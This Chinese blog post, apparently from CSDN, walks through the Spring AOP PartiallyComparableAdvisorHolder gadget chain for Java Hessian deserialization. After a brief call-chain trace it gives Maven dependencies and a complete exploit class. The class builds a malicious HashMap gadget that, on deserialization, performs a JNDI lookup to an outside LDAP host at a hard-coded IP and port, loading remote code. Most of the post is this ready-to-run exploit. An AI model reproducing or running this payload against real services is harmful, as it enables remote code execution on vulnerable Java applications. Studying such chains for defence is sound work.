目录
前言
简单分析
EXP
前言
前文:【Web】浅聊Java反序列化之Rome——关于其他利用链-CSDN博客
前文里最后给到一条HotSwappableTargetSource利用链,就是我们今天PartiallyComparableAdvisorHolder链子的前半段(触发恶意类的toString方法),故不再赘述。
多嘴提一句,复现的时候记得jdk换成8u100以下的,jdk8高版本不能执行远程文件,打不了JNDI。
简单分析
简单给出前半部分的调用关系
HashMap#put -> HashMap#putVal -> HotSwappableTargetSource#equals -> XString#equals -> AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder#toString -> ...
接下来我们来关注省略号的部分,发现接着调用了PartiallyComparableAdvisorHolder的advisor属性AspectJPointcutAdvisor的getOrder方法
跟进,调用this.advice的getOrder方法,这里是AspectJAroundAdvice#getOrder
跟进,this.aspectInstanceFactory为BeanFactoryAspectInstanceFactory,调用BeanFactoryAspectInstanceFactory#getOrder
跟进,this.beanFactory为SimpleJndiBean,调用SimpleJndiBean#getType
跟进,调用SimpleJndiBean#doGetType
跟进,name采用的是单例模式,isSingleton为true,进入if判断,调用doGetSingleton
第一次进入的时候singletonObjects是不会有对应的jndi对象的,所以进入else分支,触发lookup,从而完成JNDI注入
EXP
pom依赖
<dependencies>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-aop</artifactId>
<version>5.0.0.RELEASE</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-context</artifactId>
<version>4.1.3.RELEASE</version>
</dependency>
<dependency>
<groupId>org.aspectj</groupId>
<artifactId>aspectjweaver</artifactId>
<version>1.6.10</version>
</dependency>
<dependency>
<groupId>com.caucho</groupId>
<artifactId>hessian</artifactId>
<version>4.0.66</version>
</dependency>
</dependencies>召唤计算器的神奇咒语
package org.Hessian;
import com.caucho.hessian.io.HessianInput;
import com.caucho.hessian.io.HessianOutput;
import com.sun.org.apache.xpath.internal.objects.XString;
import org.apache.commons.logging.impl.NoOpLog;
import org.springframework.aop.aspectj.AbstractAspectJAdvice;
import org.springframework.aop.aspectj.AspectInstanceFactory;
import org.springframework.aop.aspectj.AspectJAroundAdvice;
import org.springframework.aop.aspectj.AspectJPointcutAdvisor;
import org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory;
import org.springframework.aop.target.HotSwappableTargetSource;
import org.springframework.jndi.support.SimpleJndiBeanFactory;
import sun.reflect.ReflectionFactory;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
public class EXP {
public static void main(String[] args) throws Exception {
String jndiUrl = "ldap://124.222.136.33:1337/#aaa";
SimpleJndiBeanFactory bf = new SimpleJndiBeanFactory();
bf.setShareableResources(jndiUrl);
setFieldValue(bf, "logger", new NoOpLog());
setFieldValue(bf.getJndiTemplate(), "logger", new NoOpLog());
AspectInstanceFactory aif = createWithoutConstructor(BeanFactoryAspectInstanceFactory.class);
setFieldValue(aif, "beanFactory", bf);
setFieldValue(aif, "name", jndiUrl);
AbstractAspectJAdvice advice = createWithoutConstructor(AspectJAroundAdvice.class);
setFieldValue(advice, "aspectInstanceFactory", aif);
AspectJPointcutAdvisor advisor = createWithoutConstructor(AspectJPointcutAdvisor.class);
setFieldValue(advisor, "advice", advice);
Class<?> pcahCl = Class.forName("org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder");
Object pcah = createWithoutConstructor(pcahCl);
setFieldValue(pcah, "advisor", advisor);
HotSwappableTargetSource v1 = new HotSwappableTargetSource(pcah);
HotSwappableTargetSource v2 = new HotSwappableTargetSource(new XString("xxx"));
HashMap<Object, Object> s = new HashMap<>();
setFieldValue(s, "size", 2);
Class<?> nodeC;
try {
nodeC = Class.forName("java.util.HashMap$Node");
}
catch ( ClassNotFoundException e ) {
nodeC = Class.forName("java.util.HashMap$Entry");
}
Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
nodeCons.setAccessible(true);
Object tbl = Array.newInstance(nodeC, 2);
Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
setFieldValue(s, "table", tbl);
//序列化
ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
HessianOutput hessianOutput = new HessianOutput(byteArrayOutputStream);
hessianOutput.getSerializerFactory().setAllowNonSerializable(true);
hessianOutput.writeObject(s);
hessianOutput.flush();
byte[] bytes = byteArrayOutputStream.toByteArray();
//反序列化
ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(bytes);
HessianInput hessianInput = new HessianInput(byteArrayInputStream);
hessianInput.readObject();
}
public static void setFieldValue ( final Object obj, final String fieldName, final Object value ) throws Exception {
final Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
public static Field getField ( final Class<?> clazz, final String fieldName ) throws Exception {
try {
Field field = clazz.getDeclaredField(fieldName);
if ( field != null )
field.setAccessible(true);
else if ( clazz.getSuperclass() != null )
field = getField(clazz.getSuperclass(), fieldName);
return field;
}
catch ( NoSuchFieldException e ) {
if ( !clazz.getSuperclass().equals(Object.class) ) {
return getField(clazz.getSuperclass(), fieldName);
}
throw e;
}
}
public static <T> T createWithoutConstructor ( Class<T> classToInstantiate ) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
}
public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs ) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
objCons.setAccessible(true);
Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
sc.setAccessible(true);
return (T) sc.newInstance(consArgs);
}
}
